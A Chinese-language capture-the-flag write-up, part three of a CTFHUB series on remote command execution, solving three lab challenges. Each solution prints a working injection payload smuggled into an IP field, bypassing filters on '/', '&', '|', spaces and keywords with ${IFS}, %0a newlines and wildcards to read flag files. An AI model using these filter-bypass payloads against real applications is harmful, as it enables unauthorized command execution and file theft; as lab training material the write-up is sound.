CTFHUB-RCE漏洞总结(三)
链接: CTFHUB-RCE漏洞总结(二).
一、过滤目录分割符
这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗?那必须能呀。。。
开始不得探探水,看看是什么情况,然后按照正常的方法试了一试发现有古怪,实现不了,然后喵了一眼大佬的WP,懂了直接,这就相当于直接过滤掉/目录,不能一步步打开,然后我们需要一次性读出来。
125.12.0.2;cd flag_is_here;cat flag_158032525228274.php|base64
梭哈,直接出来
二、过滤运算符
过滤了几个运算符, 要怎么绕过呢?硬绕
查看源代码发现过滤了&和|,也没什么影响就是在base64 解码上需要换一种方式。
192.168.22.77 ; base64 flag_15675302269053.php
三、综合测试
这波绝对不参考任何文章。
看了一下源码有点慌,过滤了空格 &和|,flag和ctfub也过滤了,cat过滤还不慌,下面来试一试。
空格使用<或者${IFS}代替
;使用%0a代替
flag 使用通配符代替f***
?ip=127.0.0.1%0Acd${IFS}f***_is_here${IFS}%0Abase64${IFS}f***_79667907540.php
总结:这一章的测试内容还挺好玩,实战上可能会很难出现这种高危漏洞,以上就是全部题解,大概两天时间把这一部分的WP写完,还是有些幸苦,大家要是觉得写的还可以麻烦点个小赞吧,后续会更精彩。
链接: CTFHUB-RCE漏洞总结(一).